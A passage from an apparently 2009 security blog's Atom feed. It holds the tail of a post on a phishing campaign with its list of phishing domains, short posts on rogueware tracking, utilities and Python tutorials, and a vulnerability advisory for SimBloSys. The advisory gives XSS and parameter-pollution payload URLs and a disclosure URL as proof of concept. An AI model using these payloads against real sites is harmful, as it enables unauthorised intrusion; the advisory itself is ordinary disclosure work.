&lt;span style="font-style: italic;"&gt;&lt;br /&gt;pwdgds.grab-my-block-status.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;sad-i-was-blocked.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;see-they-blocked-me.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;tchv9l.find-reason-of-being-blocked.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;they-were-haha.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;ufff-i-was-blocked.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;urr-he-blocked-us.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;weird-i-was-blocked.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;who-let-me-block.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;why-do-they-block.com&lt;/span&gt; &lt;span style="font-style: italic;"&gt;&lt;br /&gt;why-my-friends-block.com&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;wooh-im-blocked.com&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;It's extremely important to take precautionary and preventive measures necessary to avoid being victims of such techniques, extremely simple to implement and extremely effective for those who aren't aware of them.&lt;br /&gt;&lt;br /&gt;In this case, it isn't implementing a security solution at full speed but common sense. To access information on the website only legitimate and verify the existence of security measures that ensure the encryption of data.&lt;br /&gt;&lt;br /&gt;Above all, don't ask him how to get lots of information on different authentication credentials for web services and publish them on the Internet without restriction :)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Related information&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/10/nivel-de-inmadurez-en-materia-de.html"&gt;Nivel de (in)madurez en materia de prevención&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/03/phishing-kit-creador-automatico-de.html"&gt;Phishing Kit. Creador automático de sitios fraudulentos&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/02/phishing-kit-in-wild-para-clonacion-de_25.html"&gt;Phishing Kit In-the-Wild para clonación de sitios web, versión 2&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/02/phishing-kit-in-wild-para-clonacion-de.html"&gt;Phishing Kit In-the-Wild para clonación de sitios web&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/01/estado-de-la-seguridad-segn-microsoft.html"&gt;Estado de la seguridad según Microsoft&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2008/12/phishing-y-cuentos-en-navidad-el-final.html"&gt;Phishing y "cuentos" en navidad&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2008/12/phishing-para-american-express-y.html"&gt;Phishing para American Express y consejos&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-2372702916365975182?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/2372702916365975182/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=2372702916365975182' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2372702916365975182'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2372702916365975182'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/phishing-campaign-targeted-to-users-of.html' title='Phishing campaign targeted to users of MS'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Ppq0fEGkHo4/Su8QP17CH2I/AAAAAAAAB6g/H0B_-tmqzSY/s72-c/mipistus-block_checker.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-2577346430430918007</id><published>2009-11-03T06:12:00.006-11:00</published><updated>2009-11-03T16:42:52.384-11:00</updated><title type='text'>RogueSoftware: Rogueware listing</title><content type='html'>Rogueware listing or RogueSoftware listing is a free initiative of Sunbelt Software to share their valuable information to the open world.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_gJDtaXmerr4/SvBkc12LsxI/AAAAAAAAAXU/9SDhSEUNQrA/s1600-h/rogue.bmp"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 227px;" src="http://1.bp.blogspot.com/_gJDtaXmerr4/SvBkc12LsxI/AAAAAAAAAXU/9SDhSEUNQrA/s320/rogue.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5399926399870677778" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Since we found their blog interesting too, we have started listing them in our blog roll with their RSS feeds.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_gJDtaXmerr4/SvD4JwsvcsI/AAAAAAAAAXk/PZkXmF7tiVA/s1600-h/Rogue+Antispyware_1257305908157.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 155px;" src="http://1.bp.blogspot.com/_gJDtaXmerr4/SvD4JwsvcsI/AAAAAAAAAXk/PZkXmF7tiVA/s320/Rogue+Antispyware_1257305908157.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5400088799792296642" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;How can this help you? - Reading their blog and twitter would keep you updated on current rogueware infecting others, out there.&lt;br /&gt;&lt;br /&gt;Click &lt;b&gt;&lt;a href="http://twitter.com/RogueSoftware"&gt;here&lt;/a&gt;&lt;/b&gt; for reading more on RogueSoftare Twitter.&lt;br /&gt;&lt;br /&gt;Click &lt;b&gt;&lt;a href="http://rogueantispyware.blogspot.com/"&gt;here&lt;/a&gt;&lt;/b&gt; for viewing their blog.&lt;br /&gt;&lt;br /&gt;NOTE: This is &lt;b&gt;***NOT***&lt;/b&gt; an advertisement. We just want to thank every open initiative for helping Security community.&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-2577346430430918007?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/2577346430430918007/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=2577346430430918007' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2577346430430918007'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2577346430430918007'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/roguesoftware-rogueware-listing.html' title='RogueSoftware: Rogueware listing'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gJDtaXmerr4/SvBkc12LsxI/AAAAAAAAAXU/9SDhSEUNQrA/s72-c/rogue.bmp' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-7379098890275111861</id><published>2009-11-03T03:51:00.002-11:00</published><updated>2009-11-03T03:55:15.740-11:00</updated><title type='text'>Free tool to control other PC's on network</title><content type='html'>If you just want a free tool that gets the job done in terms of controlling PC's cheaply or viewing what's happening on another PC, you can use iTALC, it's free and last time I checked support was for Windows and Linux&lt;br /&gt;&lt;br /&gt;Nice thing is you can use this on your network if you are  so inclined or if you just want to test it out.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://italc.sourceforge.net/home.php"&gt;http://italc.sourceforge.net/home.php&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-7379098890275111861?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/7379098890275111861/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=7379098890275111861' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/7379098890275111861'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/7379098890275111861'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/free-tool-to-control-other-pcs-on.html' title='Free tool to control other PC&apos;s on network'/><author><name>oktet8</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/_VRSEHySfTaU/Su6LkL0Hh7I/AAAAAAAAAAM/cvE2OdT9E1M/S220/Scorpion.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-44869019907792192</id><published>2009-11-03T03:46:00.002-11:00</published><updated>2009-11-03T03:50:36.905-11:00</updated><title type='text'>Eye Protection</title><content type='html'>For all the computer nerds that spend huge amounts of time on their PC's don't forget to download&lt;br /&gt;&lt;a href="http://www.stereopsis.com/flux/"&gt;http://www.stereopsis.com/flux/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Support currently for XP/Vista and Mac OS X.&lt;br /&gt;&lt;br /&gt;Direct quote from F.lux "it makes the color of your computer's display adapt to the time of day, warm at night and like sunlight during the day.  &lt;p&gt; It's even possible that you're staying up too late because of your computer. You could use f.lux because it makes you sleep better, or you could just use it just because it makes your computer look better."&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-44869019907792192?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/44869019907792192/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=44869019907792192' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/44869019907792192'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/44869019907792192'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/eye-protection.html' title='Eye Protection'/><author><name>oktet8</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/_VRSEHySfTaU/Su6LkL0Hh7I/AAAAAAAAAAM/cvE2OdT9E1M/S220/Scorpion.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-6601093500832180616</id><published>2009-11-03T03:14:00.001-11:00</published><updated>2009-11-03T03:16:14.437-11:00</updated><title type='text'>Mac OS X:SnowChecker</title><content type='html'>Just like Linux, Windows, Unix or Mac, we all&lt;br /&gt;love free, so here is SnowChecker for Mac OS X.&lt;br /&gt;&lt;br /&gt;Why:Well if you have been waiting to upgrade&lt;br /&gt;to Snow Leopard, and did not want to check an entire list of compatibility lists, just use SnowChecker.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://snowleopard.wikidot.com/snowchecker"&gt;&lt;/a&gt;&lt;a href="http://snowleopard.wikidot.com/snowchecker"&gt;http://snowleopard.wikidot.com/snowchecker&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-6601093500832180616?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/6601093500832180616/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=6601093500832180616' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6601093500832180616'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6601093500832180616'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/mac-os-xsnowchecker.html' title='Mac OS X:SnowChecker'/><author><name>oktet8</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/_VRSEHySfTaU/Su6LkL0Hh7I/AAAAAAAAAAM/cvE2OdT9E1M/S220/Scorpion.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-2376248904182154661</id><published>2009-11-03T01:50:00.003-11:00</published><updated>2009-11-03T02:51:26.198-11:00</updated><title type='text'>Operating Systems and Useability</title><content type='html'>[Disclaimer: I make a lot of sweeping generalizations on this blog article]&lt;br /&gt;I always like the debate about  operating systems, especially when the discussion revolves around security. On one side you have the Macs which run  a modified version of Unix, Darwin OS, on the other side you have the Windows folks, and then there are the Linux(just a kernel) and Unix guys, while I can not cover each OS here comprehensively I will just try to highlight some really interesting observations about Linux.&lt;br /&gt;&lt;br /&gt;The reason, I was reading this:&lt;br /&gt;&lt;a href="http://www.ubuntugeek.com/is-ubuntu-ready-for-a-non-tech-savvy-girlfriend.html"&gt;http://www.ubuntugeek.com/is-ubuntu-ready-for-a-non-tech-savvy-girlfriend.html and this&lt;/a&gt; &amp;amp;&lt;br /&gt;&lt;a href="http://laptoplogic.com/resources/ubuntu-ready-for-your-gf"&gt;http://laptoplogic.com/resources/ubuntu-ready-for-your-gf&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;While the document seems to primarily focus on a specific Linux distro: Ubuntu, I beg to differ and argue that any OS is easy to use dependent on what the user plans to use the OS for(useage or useability).&lt;br /&gt;&lt;br /&gt;In most  cases the average consumer or  user, just wants to surf the web, check email, and watch some videos, with some word processing sprinkled in between. Any OS can probably  perform this task with some minor exceptions, especially in light of the fact that Google seems to have noticed this. Google is  planning to target audiences with Chrome OS later on in 2010, with the beta still available for download currently.Just by testing out the beta in a virtual machine, it seems Google is very smart in figuring out what consumers want and need, the OS is very simply in nature and not too complicated when compared to other Linux distro's.&lt;br /&gt;&lt;br /&gt;It's also interesting to note that Wal-Mart is already shipping and selling their Everex PC for $130 and it runs the gOS (good operating system) another linux variant based on debian just like Ubuntu.&lt;br /&gt;&lt;br /&gt;In addition OLPC (one laptop per child) is also making waves with their donations of laptops that run Linux to Africa and other countries that need them.&lt;br /&gt;&lt;br /&gt;Nevertheless, the question remains, will this be enough to woo most customers to switch from the tried and trusted Windows-very user-centric OS with about 80%  as the majority of it' s users to Linux?&lt;br /&gt;&lt;br /&gt;Overall, I am impressed with the progress being made in terms of Linux and the coverage Linux is getting, hopefully this will mean more people using Linux.&lt;br /&gt;&lt;br /&gt;In conclusion, most users use will use what is simple and works compared to whats complex and secure, good case in point is Windows Vista which was built with security in mind, but the user just did not see that, another reason why I-phones and Macs are a plus with user's at the end of the day, usability and simplicity  will always win customers over, and some people are really devoted to making good products.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-2376248904182154661?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/2376248904182154661/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=2376248904182154661' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2376248904182154661'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2376248904182154661'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/operating-systems-and-useability.html' title='Operating Systems and Useability'/><author><name>oktet8</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/_VRSEHySfTaU/Su6LkL0Hh7I/AAAAAAAAAAM/cvE2OdT9E1M/S220/Scorpion.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-6701540683197968183</id><published>2009-11-02T00:52:00.003-11:00</published><updated>2009-11-02T01:50:56.442-11:00</updated><title type='text'>Bucky's Python Programming Series</title><content type='html'>Since there are over 40 videos, we recommend everyone to continue with their Python training from Bucky's YouTube Channel &lt;a href="http://www.youtube.com/user/thenewboston"&gt;TheNewBoston&lt;/a&gt;. EvilFingers is NOT associated with Bucky, although we did paste his video series here, because we prefer to educate our users in Python and also to create awareness in scripting on an overall.&lt;br /&gt;&lt;br /&gt;Analysis or Engineering alone, cannot survive without proper integration into other fields. Scripting aids in faster analysis in some situations and scripting could automate certain Engineering tasks too. We believe that Scripting alone[without any human intervention] cannot do the job, because fortunately or unfortunately we are the ones who created it.&lt;br /&gt;&lt;br /&gt;So, kindly continue going over his video channel for completing your Python Series training. We will keep you posted if we find any other interesting, in depth Python Series. Although we want to lead you to his channel directly, instead of pasting a blog with each embedded link, we thought of grouping it up and giving it in this one:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=2IEePwMAb5Y"&gt;Python Programming Tutorial - 11 - Editing Sequences&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=96Wr1OO-4d8"&gt;Python Programming Tutorial - 12 - More List Functions&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=iD6a0G8MnjA"&gt;Python Programming Tutorial - 13 - Slicing Lists&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=ZQywX4uGIfw"&gt;Python Programming Tutorial - 14 - Intro to Methods&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=rTaMwHjvUAs"&gt;Python Programming Tutorial - 15 - More Methods&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=qUncPnnVkU0"&gt;Python Programming Tutorial - 16 - Sort and Tuples&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=pUA6b86U08c"&gt;Python Programming Tutorial - 17 - Strings n Stuff&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=5t4582nFP1c"&gt;Python Programming Tutorial - 18 - Cool String Methods&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=2j7ox_zqM4g"&gt;Python Programming Tutorial - 19 - Dictionary&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=II5WTVvryvk"&gt;Python Programming Tutorial - 20 - If Statement&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=g1maz1ynR74"&gt;Python Programming Tutorial - 21 - else and elif&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=_HJTN1JRgC8"&gt;Python Programming Tutorial - 22 - Nesting Statements&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=E-s9sXB0XwY"&gt;Python Programming Tutorial - 23 - Comparison Operators&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=cq-fGQZKLek"&gt;Python Programming Tutorial - 24 - And and Or&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=Q3T1yyGQd6o"&gt;Python Programming Tutorial - 25 - For and While Loops&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=2bw77b11bD0"&gt;Python Programming Tutorial - 26 - Infinite Loops and Break&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=gTwU8JPgu5E"&gt;Python Programming Tutorial - 27 - Building Functions&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=y_2uy1TOH1M"&gt;Python Programming Tutorial - 28 - Default Parameters&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=z1MARRoshyU"&gt;Python Programming Tutorial - 29 - Multiple Parameters&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=avhwN1LB1k8"&gt;Python Programming Tutorial - 30 - Parameter Types&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=sgnP62EXUtA"&gt;Python Programming Tutorial - 31 - Tuples as Parameters&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=JToAsK_7GmU"&gt;Python Programming Tutorial - 32 - Object Oriented Program&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=M1BAlDufqao"&gt;Python Programming Tutorial - 33 - Classes and Self&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=pVjHVfzYKn0"&gt;Python Programming Tutorial - 34 - Subclasses Superclasses&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=MLkvt2TNxv4"&gt;Python Programming Tutorial - 35 - Overwrite Variable on Sub&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=x57d_PaskKo"&gt;Python Programming Tutorial - 36 - Multiple Parent Classes&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=cb1FTIoVwu8"&gt;Python Programming Tutorial - 37 - Constructors&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=DkW5CSZ_VII"&gt;Python Programming Tutorial - 38 - Import Modules&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=JOqxKQnf5ZU"&gt;Python Programming Tutorial - 39 - reload Modules&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=a9sTtnCwuPk"&gt;Python Programming Tutorial - 40 - Getting Module Info&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=0DHt_gC-k_E"&gt;Python Programming Tutorial - 41 - Working with Files&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=gNVlxvSEFO4"&gt;Python Programming Tutorial - 42 - Reading and Writing&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=1_kGbLoY63Q"&gt;Python Programming Tutorial - 43 - Writing Lines&lt;/a&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;It is really good set of videos and definitely something that would help your Python skills. Thanks to Bucky for all his efforts in sharing his programming/coding skills.&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-6701540683197968183?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/6701540683197968183/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=6701540683197968183' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6701540683197968183'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6701540683197968183'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/buckys-python-programming-series.html' title='Bucky&apos;s Python Programming Series'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-1434710633059457135</id><published>2009-11-01T23:19:00.002-11:00</published><updated>2009-11-02T23:20:02.893-11:00</updated><title type='text'>SimBloSys - Simple Blog System: multiple vulnerabilities</title><content type='html'>While this blog software isn't known  it is a really nice project, it makes use of ATOM instead of a SQL database, a few vulnerabilities where discovered in this product.&lt;br /&gt;&lt;br /&gt;1. Advisory: SimBloSys – Simple Blog System ~ Multiple Vulnerabilities&lt;br /&gt; 2. Version Affected: 0.1,0.2&lt;br /&gt; 3. Component(s) Affected: source.php,index.php&lt;br /&gt; 4. Release Date: 02/11/2009&lt;br /&gt; 5. Background: SimBloSys is a GPL3 licensed blog system based on ATOM files.&lt;br /&gt;Developed by whitone aka Stefano Cotta Ramusino (http://www.labinf.polito.it/whitone/)&lt;br /&gt; 6. Description:&lt;br /&gt;XSS, HPP, Disclosure vulnerability, possible LFI have been found. &lt;br /&gt;  6.1 XSS &amp;amp; HPP ~ page affected: source.php&lt;br /&gt; No checks are carried, a malicious user may inject client side scripts.&lt;br /&gt;  6.2 Disclosure vulnerability ~ page affected: index.php&lt;br /&gt; Various informations are disclosed through the use of phpinfo().&lt;br /&gt;  6.3 checks are done only on file extension, every php file on the local webserver&lt;br /&gt; with the right permissions could be seen.&lt;br /&gt; 7. Proof Of Concept:&lt;br /&gt; 7.1 XSS ~ http://localhost:80/source.php?page=&lt;script&gt;alert(&amp;#8217;XSS&amp;#8217;)&lt;/script&gt;&lt;br /&gt; 7.2 HPP ~ http://localhost:80/source.php?page=index.php&amp;amp;page=&lt;script&gt;alert(&amp;#8217;XSS&amp;#8217;)&lt;/script&gt;&lt;br /&gt; 7.3 Disclosure ~ http://localhost:80/index.php?info=1&lt;br /&gt; 8. Credits: Davide “ocean” Quarta ~ http://inseclab.netsons.org&lt;br /&gt; 9. Disclaimer:&lt;br /&gt;The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.&lt;br /&gt;regards,&lt;br /&gt;ocean&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-1434710633059457135?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/1434710633059457135/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=1434710633059457135' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1434710633059457135'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1434710633059457135'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/simblosys-simple-blog-system-multiple.html' title='SimBloSys - Simple Blog System: multiple vulnerabilities'/><author><name>ocean</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-1787525938094465273</id><published>2009-11-01T12:25:00.000-11:00</published><updated>2009-11-01T12:24:52.600-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Linkdin Group'/><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware Intelligence'/><title type='text'>Malware Intelligence Linkedin Group</title><content type='html'>Malware Intelligence is a personal project for the moment is in its infancy and is part of a future website that I will be making available to the entire community of Information Security in general and in particular Security Antivirus.&lt;br /&gt;&lt;br /&gt;Then leave it up to capture a section of the site.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Ppq0fEGkHo4/StsuGd4Cz8I/AAAAAAAAB3U/dlNkKgFe75U/s1600-h/malware-intelligence-blog.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 251px; height: 400px;" src="http://1.bp.blogspot.com/_Ppq0fEGkHo4/StsuGd4Cz8I/AAAAAAAAB3U/dlNkKgFe75U/s400/malware-intelligence-blog.png" alt="" id="BLOGGER_PHOTO_ID_5393955667340087234" border="0" /&gt;&lt;/a&gt;Its creation was motivated by a number of safety projects whose intent is to channel them through the channel but at the same time projecting to all who wish to collaborate.&lt;br /&gt;&lt;br /&gt;At this time the group has 65 members and still haven't released the projects (though I hope to do to start with all of next year). As all those who wish to participate are welcome.&lt;br /&gt;&lt;br /&gt;They can access the group from 